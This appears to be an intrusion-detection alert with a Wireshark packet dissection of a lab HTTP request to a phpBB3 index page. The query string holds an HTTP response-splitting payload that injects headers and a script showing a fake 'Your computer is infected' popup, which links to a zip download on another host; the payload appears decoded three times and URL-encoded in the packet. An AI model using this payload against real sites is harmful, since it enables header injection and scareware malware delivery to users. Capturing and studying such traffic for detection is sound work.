Culprit: webiotprimeq/inputprimehttp1314321279

Code: d1

SID: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

PID: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

Match: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

Packet: <packet>
  <proto name="geninfo" pos="0" showname="General information" size="1243">
    <field name="num" pos="0" show="6520" showname="Number" value="1978" size="1243"/>
    <field name="len" pos="0" show="1243" showname="Packet Length" value="4db" size="1243"/>
    <field name="caplen" pos="0" show="1243" showname="Captured Length" value="4db" size="1243"/>
    <field name="timestamp" pos="0" show="Aug 26, 2011 03:20:19.349038000" showname="Captured Time" value="1314321619.349038000" size="1243"/>
  </proto>
<proto name="http" showname="Hypertext Transfer Protocol" size="1175" pos="68">
    <field name="" show="[truncated] GET /phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%" size="1038" pos="68" value="474554202f7068706262332f696e6465782e7068703f763d76616c253064436f6e74656e742d547970652533412532307465787425324668746d6c253064436f6e74656e742d4c656e67746825334125323032393625306425306425334368746d6c25334568746d6c68746d6c68746d6c68746d6c68746d6c68746d6c68746d6c25334325324668746d6c253345253064253343253638253734253644253643253345253343253733253633253732253639253730253734253345253644253739253546253737253639253645253634253646253737253230253344253230253737253639253645253634253646253737253245253646253730253635253645253238253232253232253243253230253232253644253739253737253639253645253634253646253737253331253232253243253230253232253733253734253631253734253735253733253344253331253243253737253639253634253734253638253344253334253335253330253243253638253635253639253637253638253734253344253332253335253330253232253239253342253644253739253546253737253639253645253634253646253737253245253634253646253633253735253644253635253645253734253245253737253732253639253734253635253238253232253343253638253331253345253231253231253231253539253646253735253732253230253633253646253644253730253735253734253635253732253230253639253733253230253639253645253636253635253633253734253635253634253231253231253231253343253246253638253331253345253232253239253342253644253739253546253737253639253645253634253646253737253245253634253646253633253735253644253635253645253734253245253737253732253639253734253635253238253232253343253638253332253345253433253643253639253633253642253230253734253646253230253343253631253230253638253732253635253636253344253638253734253734253730253341253246253246253331253339253332253245253331253336253338253245253331253334253337253245253331253333253330253246253634253737253645253643253634253245253741253639253730253345253230253634253646253737253645253643253646253631253634253343253246253631253345253230253739253646253735253732253230253631253645253734253639253244253736253639253732253735253733253230253645253646253737253343253246253638253332253345253232253239253342253343253246253733253633253732253639253730253734253345253343253246253638253734253644253643253345 485454502f312e310d0a">
      <field name="http.request.method" showname="Request Method: GET" size="3" pos="68" show="GET" value="474554"/>
      <field name="http.request.uri" showname="Request URI [truncated]: /phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%" size="1023" pos="72" show="/phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%22%2C%20%22%6D%79%77%69%6E%64%6F%77%31%22%2C%20%22%73%74%61%74%75%73%3D%31%2C%77%69%64%74%68%3D%34%35%30%2C%68%65%69%67%68%74%3D%32%35%30%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%31%3E%21%21%21%59%6F%75%72%20%63%6F%6D%70%75%74%65%72%20%69%73%20%69%6E%66%65%63%74%65%64%21%21%21%3C%2F%68%31%3E%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%32%3E%43%6C%69%63%6B%20%74%6F%20%3C%61%20%68%72%65%66%3D%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%34%37%2E%31%33%30%2F%64%77%6E%6C%64%2E%7A%69%70%3E%20%64%6F%77%6E%6C%6F%61%64%3C%2F%61%3E%20%79%6F%75%72%20%61%6E%74%69%2D%76%69%72%75%73%20%6E%6F%77%3C%2F%68%32%3E%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%2F%68%74%6D%6C%3E" 
value="2f7068706262332f696e6465782e7068703f763d76616c253064436f6e74656e742d547970652533412532307465787425324668746d6c253064436f6e74656e742d4c656e67746825334125323032393625306425306425334368746d6c25334568746d6c68746d6c68746d6c68746d6c68746d6c68746d6c68746d6c25334325324668746d6c2533452530642533432536382537342536442536432533452533432537332536332537322536392537302537342533452536442537392535462537372536392536452536342536462537372532302533442532302537372536392536452536342536462537372532452536462537302536352536452532382532322532322532432532302532322536442537392537372536392536452536342536462537372533312532322532432532302532322537332537342536312537342537352537332533442533312532432537372536392536342537342536382533442533342533352533302532432536382536352536392536372536382537342533442533322533352533302532322532392533422536442537392535462537372536392536452536342536462537372532452536342536462536332537352536442536352536452537342532452537372537322536392537342536352532382532322533432536382533312533452532312532312532312535392536462537352537322532302536332536462536442537302537352537342536352537322532302536392537332532302536392536452536362536352536332537342536352536342532312532312532312533432532462536382533312533452532322532392533422536442537392535462537372536392536452536342536462537372532452536342536462536332537352536442536352536452537342532452537372537322536392537342536352532382532322533432536382533322533452534332536432536392536332536422532302537342536462532302533432536312532302536382537322536352536362533442536382537342537342537302533412532462532462533312533392533322532452533312533362533382532452533312533342533372532452533312533332533302532462536342537372536452536432536342532452537412536392537302533452532302536342536462537372536452536432536462536312536342533432532462536312533452532302537392536462537352537322532302536312536452537342536392532442537362536392537322537352537332532302536452536462537372533432532462536382533322533452532322532392533422533432532462537332536332537322536392537302537342533452533432532462536382537342536442536432533452"/>
      <field name="http.request.version" showname="Request Version: HTTP/1.1" size="8" pos="1096" show="HTTP/1.1" value="485454502f312e31"/>
    </field>
    <field name="http.user_agent" showname="User-Agent: curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1\r\n" size="99" pos="1106" show="curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1" value="557365722d4167656e743a206375726c2f372e31382e302028693438362d70632d6c696e75782d676e7529206c69626375726c2f372e31382e30204f70656e53534c2f302e392e3867207a6c69622f312e322e332e33206c696269646e2f312e310d0a"/>
    <field name="http.host" showname="Host: 192.168.147.128\r\n" size="23" pos="1205" show="192.168.147.128" value="486f73743a203139322e3136382e3134372e3132380d0a"/>
    <field name="http.accept" showname="Accept: */*\r\n" size="13" pos="1228" show="*/*" value="4163636570743a202a2f2a0d0a"/>
    <field name="" show="\r\n" size="2" pos="1241" value="0d0a"/>
    <field name="http.request" showname="Request: True" hide="yes" size="0" pos="68" show="1"/>
  </proto>
</packet>

